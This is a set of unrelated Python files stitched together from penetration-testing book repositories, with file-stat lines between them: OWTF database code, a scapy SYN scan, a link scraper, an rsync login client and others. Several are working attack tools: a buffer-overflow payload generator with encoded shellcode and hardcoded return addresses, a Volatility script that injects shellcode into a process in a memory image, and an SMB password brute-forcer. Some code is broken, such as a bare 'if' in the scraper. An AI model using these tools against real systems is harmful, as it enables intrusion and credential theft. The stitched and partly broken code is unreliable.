from owtf.db.session import get_count, get_scoped_session
from owtf.transactions.base import HTTPTransaction
from owtf.lib.exceptions import InvalidParameterType, InvalidTransactionReference
from owtf.managers.target import target_required
from owtf.managers.url import import_processed_url
from owtf.models.grep_output import GrepOutput
from owtf.models.transaction import Transaction
from owtf.utils.strings import get_header_list, str2bool
# The regex find differs for these types :P
REGEX_TYPES = ["HEADERS", "BODY"]
@target_required
def num_transactions(session, scope=True, target_id=None):
"""Return number of transactions in scope by default
:param scope: In/out scope
:type scope: `bool`
:param target_id: ID of the target
:type target_id: `int`
:return: Number of transactions in scope
:rtype: `int`
"""
count = get_count(
session.query(Transaction).filter_by(scope=scope, target_id=target_id)
)
return count
@target_required
def is_transaction_already_added(session, criteria, target_id=None):
"""Checks if the transaction is already in the DB
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: Target ID
:type target_id: `int`
:return: True/False
:rtype: `bool`
"""
return len(get_all_transactions(session, criteria, target_id=target_id)) > 0
def transaction_gen_query(session, criteria, target_id, for_stats=False):
"""Generate query based on criteria
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: Target ID
:type target_id: `int`
:param for_stats: True/False
:type for_stats: `bool`
:return:
:rtype:
"""
query = session.query(Transaction).filter_by(target_id=target_id)
# If transaction search is being done
if criteria.get("search", None):
if criteria.get("url", None):
if isinstance(criteria.get("url"), list):
criteria["url"] = criteria["url"][0]
query = query.filter(
Transaction.url.like("%%{!s}%%".format(criteria["url"]))
)
if criteria.get("method", None):
if isinstance(criteria.get("method"), list):
criteria["method"] = criteria["method"][0]
query = query.filter(
Transaction.method.like("%%{!s}%%".format(criteria.get("method")))
)
if criteria.get("data", None):
if isinstance(criteria.get("data"), list):
criteria["data"] = criteria["data"][0]
query = query.filter(
Transaction.data.like("%%{!s}%%".format(criteria.get("data")))
)
if criteria.get("raw_request", None):
if isinstance(criteria.get("raw_request"), list):
criteria["raw_request"] = criteria["raw_request"][0]
query = query.filter(
Transaction.raw_request.like(
"%%{!s}%%".format(criteria.get("raw_request"))
)
)
if criteria.get("response_status", None):
if isinstance(criteria.get("response_status"), list):
criteria["response_status"] = criteria["response_status"][0]
query = query.filter(
Transaction.response_status.like(
"%%{!s}%%".format(criteria.get("response_status"))
)
)
if criteria.get("response_headers", None):
if isinstance(criteria.get("response_headers"), list):
criteria["response_headers"] = criteria["response_headers"][0]
query = query.filter(
Transaction.response_headers.like(
"%%{!s}%%".format(criteria.get("response_headers"))
)
)
if criteria.get("response_body", None):
if isinstance(criteria.get("response_body"), list):
criteria["response_body"] = criteria["response_body"][0]
query = query.filter(
Transaction.binary_response is False,
Transaction.response_body.like(
"%%{!s}%%".format(criteria.get("response_body"))
),
)
else: # If transaction filter is being done
if criteria.get("url", None):
if isinstance(criteria.get("url"), str):
query = query.filter_by(url=criteria["url"])
if isinstance(criteria.get("url"), list):
query = query.filter(Transaction.url.in_(criteria.get("url")))
if criteria.get("method", None):
if isinstance(criteria.get("method"), str):
query = query.filter_by(method=criteria["method"])
if isinstance(criteria.get("method"), list):
query = query.filter(Transaction.method.in_(criteria.get("method")))
if criteria.get("data", None):
if isinstance(criteria.get("data"), str):
query = query.filter_by(data=criteria["data"])
if isinstance(criteria.get("data"), list):
query = query.filter(Transaction.data.in_(criteria.get("data")))
# For the following section doesn't matter if filter/search because
# it doesn't make sense to search in a boolean column :P
if criteria.get("scope", None):
if isinstance(criteria.get("scope"), list):
criteria["scope"] = criteria["scope"][0]
query = query.filter_by(scope=str2bool(criteria["scope"]))
if criteria.get("binary_response", None):
if isinstance(criteria.get("binary_response"), list):
criteria["binary_response"] = criteria["binary_response"][0]
query = query.filter_by(binary_response=str2bool(criteria["binary_response"]))
if not for_stats: # query for stats shouldn't have limit and offset
try:
query.order_by(Transaction.local_timestamp)
if criteria.get("offset", None):
if isinstance(criteria.get("offset"), list):
criteria["offset"] = int(criteria["offset"][0])
if criteria["offset"] >= 0:
query = query.offset(criteria["offset"])
if criteria.get("limit", None):
if isinstance(criteria.get("limit"), list):
criteria["limit"] = int(criteria["limit"][0])
if criteria["limit"] >= 0:
query = query.limit(criteria["limit"])
else: # It is too dangerous without a limit argument
query.limit(10) # Default limit value is 10
except ValueError:
raise InvalidParameterType("Invalid parameter type for transaction db")
return query
@target_required
def get_first(session, criteria, target_id=None):
"""Assemble only the first transaction that matches the criteria from DB
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: Target ID
:type target_id: `int`
:return:
:rtype:
"""
query = transaction_gen_query(session, criteria, target_id)
return get_transaction(query.first())
@target_required
def get_all_transactions(session, criteria, target_id=None):
"""Assemble ALL transactions that match the criteria from DB
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: target ID
:type target_id: `int`
:return:
:rtype:
"""
query = transaction_gen_query(session, criteria, target_id)
return get_transactions(query.all())
def get_transaction(trans):
"""Fetch transaction from the DB
:param trans: OWTF transaction
:type trans: :`Class:transaction.HTTP_Transaction`
:return:
:rtype:
"""
if trans:
owtf_transaction = HTTPTransaction(None)
response_body = trans.response_body
if trans.binary_response:
response_body = base64.b64decode(response_body)
owtf_transaction.set_transaction_from_db(
trans.id,
trans.url,
trans.method,
trans.response_status,
str(trans.time),
trans.time_human,
trans.local_timestamp,
trans.data,
trans.raw_request,
trans.response_headers,
len(response_body),
response_body,
)
return owtf_transaction
return None
def get_transactions(transactions):
"""Get multiple transactions from the DB
:param transactions: List of transactions objects
:type transactions: `list`
:return: List of transactions
:rtype: `list`
"""
return [
get_transaction(transaction)
for transaction in transactions
if transaction is not None
]
def get_transaction_model(transaction):
"""Generate object to be added to the DB
:param transaction: OWTF transaction
:type transaction: `Class:transaction.HTTP_Transaction`
:return: Transaction object
:rtype: `Class:model.Transaction`
"""
response_body = None
binary_response = None
try:
response_body = transaction.get_raw_response_body.encode("utf-8")
binary_response = False
except UnicodeDecodeError:
response_body = base64.b64encode(transaction.get_raw_response_body)
binary_response = True
finally:
transaction_model = Transaction(
url=transaction.url,
scope=transaction.in_scope,
method=transaction.method,
data=transaction.data,
time=float(transaction.time),
time_human=transaction.time_human,
local_timestamp=transaction.local_timestamp,
raw_request=transaction.get_raw_request,
response_status=transaction.get_status,
response_headers=transaction.get_response_headers,
response_body=response_body,
response_size=len(response_body) if response_body is not None else 0,
binary_response=binary_response,
session_tokens=json.dumps(transaction.get_session_tokens()),
)
return transaction_model
@target_required
def log_transactions(session, transaction_list, target_id=None):
"""This function does the following things in order
+ Add all transactions to a session and commit
+ Add all the grepped results and commit
+ Add all urls to url db
:param transaction_list: List of transaction objects
:type transaction_list: `list`
:param target_id: target ID
:type target_id: `int`
:return:
:rtype:
"""
# Create a usable session
# Initiate urls_list for holding urls and transaction_model_list for holding transaction models
urls_list = []
transaction_model_list = []
# Add transactions and commit so that we can have access to
# transaction ids etc..
for transaction_obj in transaction_list:
# TODO: This shit will go crazy on non-ascii characters
transaction_model = get_transaction_model(transaction_obj)
transaction_model.target_id = target_id
transaction_model_list.append(transaction_model)
session.add(transaction_model)
urls_list.append([transaction_obj.url, True, transaction_obj.in_scope])
session.commit()
# Now since we have the ids ready, we can process the grep output and
# add accordingly. So iterate over transactions and their
for i, obj in enumerate(transaction_list):
# Get the transaction and transaction model from their lists
owtf_transaction = transaction_list[i]
transaction_model = transaction_model_list[i]
# Check if grepping is valid for this transaction
# For grepping to be valid
# + Transaction must not have a binary response
# + Transaction must be in scope
if (not transaction_model.binary_response) and (transaction_model.scope):
# Get the grep results
grep_outputs = grep_transaction(owtf_transaction)
if grep_outputs: # If valid grep results exist
# Iterate over regex_name and regex results
for regex_name, regex_results in grep_outputs.items():
# Then iterate over the results to store each result in
# a separate row, but also check to avoid duplicate
# entries as we have many-to-many relationship
# available for linking
for match in regex_results:
# Convert the match to json
match = json.dumps(match)
# Fetch if any existing entry
existing_grep_output = session.query(GrepOutput).filter_by(
target_id=target_id, name=regex_name, output=match
).first()
if existing_grep_output:
existing_grep_output.transactions.append(transaction_model)
session.merge(existing_grep_output)
else:
session.add(
GrepOutput(
target_id=target_id,
transactions=[transaction_model],
name=regex_name,
output=match,
)
)
session.commit()
import_processed_url(session=session, urls_list=urls_list, target_id=target_id)
def log_transactions_from_logger(transactions_dict):
"""Logs transactions as they come into the DB
.. note::
Transaction_dict is a dictionary with target_id as key and list of owtf transactions
:param transactions_dict: Dict of target id and corresponding owtf transactions
:type transactions_dict: `dict`
:return: None
:rtype: None
"""
session = get_scoped_session()
for target_id, transaction_list in list(transactions_dict.items()):
if transaction_list:
log_transactions(
session=session, transaction_list=transaction_list, target_id=target_id
)
@target_required
def delete_transaction(session, transaction_id, target_id=None):
"""Deletes transaction from DB
:param transaction_id: transaction ID
:type transaction_id: `int`
:param target_id: target ID
:type target_id: `int`
:return: None
:rtype: None
"""
session.query(Transaction).filter_by(
target_id=target_id, id=transaction_id
).delete()
session.commit()
@target_required
def get_num_transactions_inscope(target_id=None):
"""Gets number of transactions in scope
:param target_id: target ID
:type target_id: `int`
:return: Number of transactions in scopes
:rtype: `int`
"""
return num_transactions(target_id=target_id)
def get_transaction_by_id(id):
"""Get transaction object by id
:param id: ID to fetch
:type id: `int`
:return: Transaction object
:rtype: `Class:model.Transaction`
"""
session = get_scoped_session()
model_obj = None
try:
id = int(id)
model_obj = session.query(Transaction).get(id)
except ValueError:
pass
finally:
return model_obj # None returned if no such transaction.
def get_transactions_by_id(id_list):
"""Get transactions by id list
:param id_list: List of ids
:type id_list: `list`
:return: List of transaction objects
:rtype: `list`
"""
model_objs = []
for id in id_list:
model_obj = get_transaction_by_id(id)
if model_obj:
model_objs.append(model_obj)
return get_transactions(model_objs)
@target_required
def get_top_by_speed(session, order="Desc", num=10, target_id=None):
"""Get top transactions by speed
:param order: Ascending/descending order
:type order: `str`
:param num: Num of transactions to fetch
:type num: `int`
:param target_id: target ID
:type target_id: `int`
:return: List of transactions
:rtype: `list`
"""
if order == "Desc":
results = session.query(Transaction).filter_by(target_id=target_id).order_by(
desc(Transaction.time)
).limit(
num
)
else:
results = session.query(Transaction).filter_by(target_id=target_id).order_by(
asc(Transaction.time)
).limit(
num
)
return get_transactions(results)
def compile_header_regex(header_list):
"""Compile a regex
:param header_list: List of header strings
:type header_list: `list`
:return:
:rtype:
"""
return re.compile("(%s): ([^\r]*)" % "|".join(header_list), re.IGNORECASE)
def compile_response_regex(regexp):
"""Compile a response regex
:param regexp: Regex
:type regexp: `str`
:return:
:rtype:
"""
return re.compile(regexp, re.IGNORECASE | re.DOTALL)
def compile_regex():
"""General function for getting and compiling regexes
:return: None
:rtype: None
"""
for key in list(config_handler.get_framework_config_dict.keys()):
key = key[3:-3] # Remove "@@@"
if key.startswith("HEADERS"):
header_list = get_header_list(key)
regexes["HEADERS"][key] = compile_header_regex(header_list)
elif key.startswith("RESPONSE"):
_, _, python_regexp = config_handler.get_val(key).split("_____")
regexes["BODY"][key] = compile_response_regex(python_regexp)
def grep_transaction(owtf_transaction):
"""Grep transaction
:param owtf_transaction: OWTF transaction
:type owtf_transaction:
:return: Output
:rtype: `dict`
"""
grep_output = {}
for regex_name, regex in list(regexes["HEADERS"].items()):
grep_output.update(grep_response_headers(regex_name, regex, owtf_transaction))
for regex_name, regex in list(regexes["BODY"].items()):
grep_output.update(grep_response_body(regex_name, regex, owtf_transaction))
return grep_output
def grep_response_body(regex_name, regex, owtf_transaction):
"""Grep response body
:param regex_name: Regex name
:type regex_name: `str`
:param regex: Regex
:type regex:
:param owtf_transaction: OWTF transaction
:type owtf_transaction:
:return: Output
:rtype: `dict`
"""
return grep(regex_name, regex, owtf_transaction.get_raw_response_body)
def grep_response_headers(regex_name, regex, owtf_transaction):
"""Grep response headers
:param regex_name: Name of regex
:type regex_name: `str`
:param regex: Regex
:type regex:
:param owtf_transaction: OWTF transaction
:type owtf_transaction:
:return: Output
:rtype: `dict`
"""
return grep(regex_name, regex, owtf_transaction.get_response_headers)
def grep(regex_name, regex, data):
"""Run regex
:param regex_name: Name of regex
:type regex_name: `str`
:param regex: Regex
:type regex:
:param data: Data
:type data: `str`
:return: Output from grep
:rtype: `dict`
"""
results = regex.findall(data)
output = {}
if results:
output.update({regex_name: results})
return output
@target_required
def search_by_regex_name(session, regex_name, stats=False, target_id=None):
"""Allows searching of the grep_outputs table using a regex name
.. note::
What this function returns :
+ regex_name
+ grep_outputs - list of unique matches
+ transaction_ids - list of one transaction id per unique match
+ match_percent
:param regex_name: Name of regex
:type regex_name: `str`
:param stats: true/false
:type stats: `bool`
:param target_id: target ID
:type target_id: `int`
:return: List of results
:rtype: `list`
"""
# Get the grep outputs and only unique values
grep_outputs = session.query(GrepOutput.output).filter_by(
name=regex_name, target_id=target_id
).group_by(
GrepOutput.output
).all()
grep_outputs = [i[0] for i in grep_outputs]
# Get one transaction per match
transaction_ids = []
for grep_output in grep_outputs:
transaction_ids.append(
session.query(Transaction.id).join(Transaction.grep_outputs).filter(
GrepOutput.output == grep_output, GrepOutput.target_id == target_id
).limit(
1
).all()[
0
][
0
]
)
# Calculate stats if needed
if stats:
# Calculate the total number of matches
num_matched_transactions = get_count(
session.query(Transaction).join(Transaction.grep_outputs).filter(
GrepOutput.name == regex_name, GrepOutput.target_id == target_id
).group_by(
Transaction
)
)
# Calculate total number of transactions in scope
num_transactions_in_scope = get_count(
session.query(Transaction).filter_by(scope=True, target_id=target_id)
)
# Calculate matched percentage
if int(num_transactions_in_scope):
match_percent = int(
(num_matched_transactions / float(num_transactions_in_scope)) * 100
)
else:
match_percent = 0
else:
match_percent = None
return [
regex_name,
[json.loads(i) for i in grep_outputs],
transaction_ids,
match_percent,
]
@target_required
def search_by_regex_names(name_list, stats=False, target_id=None):
"""Allows searching of the grep_outputs table using a regex name
.. note::
What this function returns is a list of list containing
+ regex_name
+ grep_outputs - list of unique matches
+ transaction_ids - list of one transaction id per unique match
+ match_percent
:param name_list: List of names
:type name_list: `list`
:param stats: True/false
:type stats: `bool`
:param target_id: target ID
:type target_id: `int`
:return: List of matched ids
:rtype: `list`
"""
session = get_scoped_session()
results = [
search_by_regex_name(session, regex_name, stats=stats, target_id=target_id)
for regex_name in name_list
]
return results
def get_transaction_dicts(tdb_obj_list, include_raw_data=False):
"""Derive a list of transaction dicts from an object list
:param tdb_obj_list: List of transaction objects
:type tdb_obj_list: `list`
:param include_raw_data: true/false to include raw transactions
:type include_raw_data: `bool`
:return: List of transaction dicts
:rtype: `list`
"""
return [tdb_obj.to_dict(include_raw_data) for tdb_obj in tdb_obj_list]
@target_required
def search_all_transactions(session, criteria, target_id=None, include_raw_data=True):
"""Search all transactions.Three things needed
+ Total number of transactions
+ Filtered transaction dicts
+ Filtered number of transactions
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: target ID
:type target_id: `int`
:param include_raw_data: True/False to include raw data
:type include_raw_data: `bool`
:return: Results
:rtype: `dict`
"""
total = get_count(session.query(Transaction).filter_by(target_id=target_id))
filtered_transaction_objs = transaction_gen_query(
session, criteria, target_id
).all()
filtered_number = get_count(
transaction_gen_query(session, criteria, target_id, for_stats=True)
)
results = {
"records_total": total,
"records_filtered": filtered_number,
"data": get_transaction_dicts(filtered_transaction_objs, include_raw_data),
}
return results
@target_required
def get_all_transactions_dicts(
session, criteria, target_id=None, include_raw_data=False
):
"""Assemble ALL transactions that match the criteria from DB.
:param criteria: Filter criteria
:type criteria: `dict`
:param target_id: target ID
:type target_id: `int`
:param include_raw_data: True/False as to include raw data
:type include_raw_data: `bool`
:return: List of transaction dicts
:rtype: `list`
"""
query = get_all_transactions(session, criteria, target_id)
transaction_objs = query.all()
return get_transaction_dicts(transaction_objs, include_raw_data)
@target_required
def get_by_id_as_dict(session, trans_id, target_id=None):
"""Get transaction dict by ID
:param trans_id: Transaction ID
:type trans_id: `int`
:param target_id: Target ID
:type target_id: `int`
:return: transaction object as dict
:rtype: `dict`
"""
transaction_obj = session.query(Transaction).filter_by(
target_id=target_id, id=trans_id
).first()
if not transaction_obj:
raise InvalidTransactionReference(
"No transaction with {!s} exists".format(trans_id)
)
return transaction_obj.to_dict(include_raw_data=True)
@target_required
def get_hrt_response(session, filter_data, trans_id, target_id=None):
"""Converts the transaction and calls hrt
:param filter_data: Filter data
:type filter_data: `dict`
:param trans_id: Transaction ID
:type trans_id: `int`
:param target_id: Target ID
:type target_id: `int`
:return: Converted code
:rtype: `string`
"""
transaction_obj = session.query(Transaction).filter_by(
target_id=target_id, id=trans_id
).first()
# Data validation
languages = ["bash"] # Default script language is set to bash.
if filter_data.get("language"):
languages = [x.strip() for x in filter_data["language"]]
proxy = None
search_string = None
data = None
if filter_data.get("proxy"):
proxy = filter_data["proxy"][0]
if filter_data.get("search_string"):
search_string = filter_data["search_string"][0]
if filter_data.get("data"):
data = filter_data["data"][0]
# If target not found. Raise error.
if not transaction_obj:
raise InvalidTransactionReference(
"No transaction with {!s} exists".format(trans_id)
)
raw_request = transaction_obj.raw_request
try:
hrt_obj = HttpRequestTranslator(
request=raw_request,
languages=languages,
proxy=proxy,
search_string=search_string,
data=data,
)
codes = hrt_obj.generate_code()
return "".join(v for v in list(codes.values()))
except Exception as e:
logging.error("Unexpected exception when running HRT: $s", str(e))
return str(e)
regexes = defaultdict(list)
for regex_type in REGEX_TYPES:
regexes[regex_type] = {}
compile_regex()
| 32.62762 | 99 | 0.614426 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint
ethernet = Ether()
network = IP(dst = ['rejahrehim.com', '192.168.1.1', '192.168.1.2'])
# transport = TCP(dport=53, flags = 'S')
transport = TCP(dport=[(53, 100)], flags = 'S')
packet = ethernet/network/transport
# pprint(packet)
# pprint([pkt for pkt in packet])
for pkt in packet:
# ls(pkt)
pkt.show()
| 22.933333 | 68 | 0.664804 |
cybersecurity-penetration-testing | import urllib2
from bs4 import BeautifulSoup
import sys
import time
tarurl = sys.argv[1]
if tarurl[-1] == "/":
tarurl = tarurl[:-1]
print"<MaltegoMessage>"
print"<MaltegoTransformResponseMessage>"
print" <Entities>"
url = urllib2.urlopen(tarurl).read()
soup = BeautifulSoup(url)
for line in soup.find_all('a'):
newline = line.get('href')
if newline[:4] == "http":
print"<Entity Type=\"maltego.Domain\">"
print"<Value>"+str(newline)+"</Value>"
print"</Entity>"
elif newline[:1] == "/":
combline = tarurl+newline
if
print"<Entity Type=\"maltego.Domain\">"
print"<Value>"+str(combline)+"</Value>"
print"</Entity>"
print" </Entities>"
print"</MaltegoTransformResponseMessage>"
print"</MaltegoMessage>" | 23.931034 | 42 | 0.684211 |
Hands-On-Penetration-Testing-with-Python | >>> import multiprocessing
>>> def process_me(id):
... print("Process " +str(id))
...
>>> for i in range(5):
... p=multiprocessing.Process(target=process_me,args=(i,))
... p.start()
>>> Process 0
>>> Process 1
>>> Process 2
>>> Process 3
>>> Process 4
import multiprocessing as mp
>>> class a(mp.Process):
... def __init__(self):
... threading.Thread.__init__(self)
... def run(self):
... print("Process started")
...
>>> obj=a()
>>> obj.start()
| 21.636364 | 62 | 0.539235 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
# Payload generator
## Total payload length
payload_length = 424
## Amount of nops
nop_length = 100
## Controlled memory address to return to in Little Endian format
#0x7fffffffddc0
#0x7fffffffe120
#current 0x7fffffffdf80: 0xffffdfa0
#0x7fffffffdde0
#return_address = '\x20\xe1\xff\xff\xff\x7f\x00\x00'
#IT must be noted that return address is $rsp
#00007fffffffde30
#THis is the contents of the register r9 ,where teh shell code is placed ,its verified with edebugger.THis methos is importent for cases when we dont have access over source code of the application ,and its built on assumption that teh address of register r9 willnot change over consective runs as address randomization is disabled.If the address changes ,then ideally we should look for an instruction that says jmp r9
return_address = '\x30\xde\xff\xff\xff\x7f\x00\x00' #oreg
return_address = '\xf0\xdd\xff\xff\xff\x7f\x00\x00'
#Currently we are doing something wrong whoile generating the payload !
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 41.25 | 419 | 0.737352 |
cybersecurity-penetration-testing | #!/usr/bin/python
string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
list = []
answer = []
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
cybersecurity-penetration-testing | import sys
import struct
equals_button = 0x01005D51
memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"
slack_space = None
trampoline_offset = None
# read in our shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "Win2003SP2x86"
config.LOCATION = "file://%s" % memory_file
import volatility.plugins.taskmods as taskmods
p = taskmods.PSList(config)
for process in p.calculate():
if str(process.ImageFileName) == "calc.exe":
print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
print "[*] Hunting for physical offsets...please wait."
address_space = process.get_process_address_space()
pages = address_space.get_available_pages()
for page in pages:
physical = address_space.vtop(page[0])
if physical is not None:
if slack_space is None:
fd = open(memory_file,"r+")
fd.seek(physical)
buf = fd.read(page[1])
try:
offset = buf.index("\x00" * len(sc))
slack_space = page[0] + offset
print "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x" % slack_space
print "[*] Physical address: 0x%08x" % (physical + offset)
print "[*] Injecting shellcode."
fd.seek(physical + offset)
fd.write(sc)
fd.flush()
# create our trampoline
tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
tramp += "\xff\xe3"
if trampoline_offset is not None:
break
except:
pass
fd.close()
# check for our target code location
if page[0] <= equals_button and equals_button < ((page[0] + page[1])-7):
# calculate virtual offset
v_offset = equals_button - page[0]
# now calculate physical offset
trampoline_offset = physical + v_offset
print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
if slack_space is not None:
break
print "[*] Writing trampoline..."
fd = open(memory_file, "r+")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()
print "[*] Done injecting code."
| 31.752294 | 160 | 0.48585 |
PenetrationTestingScripts | import base64
import re
try:
import hashlib
hash_md4 = hashlib.new("md4")
hash_md5 = hashlib.md5()
except ImportError:
# for Python << 2.5
import md4
import md5
hash_md4 = md4.new()
hash_md5 = md5.new()
# Import SOCKS module if it exists, else standard socket module socket
try:
import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket
from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn
except ImportError:
import socket
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ["rsync"]
# The standard rsync server control port
RSYNC_PORT = 873
# The sizehint parameter passed to readline() calls
MAXLINE = 8192
protocol_version = 0
# Exception raised when an error or invalid response is received
class Error(Exception): pass
# All exceptions (hopefully) that may be raised here and that aren't
# (always) programming errors on our side
all_errors = (Error, IOError, EOFError)
# Line terminators for rsync
CRLF = '\r\n'
LF = '\n'
# The class itself
class rsync:
'''An rsync client class.
To create a connection, call the class using these arguments:
host, module, user, passwd
All arguments are strings, and have default value ''.
Then use self.connect() with optional host and port argument.
'''
debugging = 0
host = ''
port = RSYNC_PORT
maxline = MAXLINE
sock = None
file = None
server_protocol_version = None
# Initialization method (called by class instantiation).
# Initialize host to localhost, port to standard rsync port
# Optional arguments are host (for connect()),
# and module, user, passwd (for login())
def __init__(self, host='', module='', user='', passwd='',port=873,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
if host:
self.connect(host)
if module and user and passwd:
self.login(module, user, passwd)
def connect(self, host='', port=0, timeout=-999):
'''Connect to host. Arguments are:
- host: hostname to connect to (string, default previous host)
- port: port to connect to (integer, default previous port)
'''
if host != '':
self.host = host
if port > 0:
self.port = port
if timeout != -999:
self.timeout = timeout
self.sock = socket.create_connection((self.host, self.port), self.timeout)
self.af = self.sock.family
self.file = self.sock.makefile('rb')
self.server_protocol_version = self.getresp()
self.protocol_version = self.server_protocol_version[-2:]
return self.server_protocol_version
def set_debuglevel(self, level):
'''Set the debugging level.
The required argument level means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
'''
self.debugging = level
debug = set_debuglevel
# Internal: send one line to the server, appending LF
def putline(self, line):
line = line + LF
if self.debugging > 1: print '*put*', line
self.sock.sendall(line)
# Internal: return one line from the server, stripping LF.
# Raise EOFError if the connection is closed
def getline(self):
line = self.file.readline(self.maxline + 1)
if len(line) > self.maxline:
raise Error("got more than %d bytes" % self.maxline)
if self.debugging > 1:
print '*get*', line
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
# Internal: get a response from the server, which may possibly
# consist of multiple lines. Return a single string with no
# trailing CRLF. If the response consists of multiple lines,
# these are separated by '\n' characters in the string
def getmultiline(self):
line = self.getline()
return line
# Internal: get a response from the server.
# Raise various errors if the response indicates an error
def getresp(self):
resp = self.getmultiline()
if self.debugging: print '*resp*', resp
if resp.find('ERROR') != -1:
raise Error, resp
else:
return resp
def sendcmd(self, cmd):
'''Send a command and return the response.'''
self.putline(cmd)
return self.getresp()
def login(self, module='', user = '', passwd = ''):
if not user: user = 'www'
if not passwd: passwd = 'www'
if not module: module = 'www'
self.putline(self.server_protocol_version)
# self.putline('@RSYNCD: 28.0')
# self.protocol_version = 28
resp = self.sendcmd(module)
challenge = resp[resp.find('AUTHREQD ')+9:]
if self.protocol_version >= 30:
md5=hashlib.md5()
md5.update(passwd)
md5.update(challenge)
hash = base64.b64encode(md5.digest())
else:
md4=hashlib.new('md4')
tmp = '\0\0\0\0' + passwd + challenge
md4.update(tmp)
hash = base64.b64encode(md4.digest())
response, number = re.subn(r'=+$','',hash)
print response
resp = self.sendcmd(user + ' ' + response)
if resp.find('OK') == -1:
raise Error, resp
return resp
def getModules(self):
'''Get modules on the server'''
print self.server_protocol_version
self.putline(self.server_protocol_version)
resp = self.sendcmd('')
print resp
return resp
def close(self):
'''Close the connection without assuming anything about it.'''
self.putline('')
if self.file is not None:
self.file.close()
if self.sock is not None:
self.sock.close()
self.file = self.sock = None
| 29.625641 | 82 | 0.603584 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/smb.conf")
def smb_connect(self,ip,username,password):
crack =0
try:
smb = SMBConnection('*SMBSERVER', ip)
smb.login(username,password)
smb.logoff()
crack =1
except Exception, e:
self.lock.acquire()
print "%s smb 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def smb_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.smb_connect(ip,username,password)==1:
self.lock.acquire()
printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
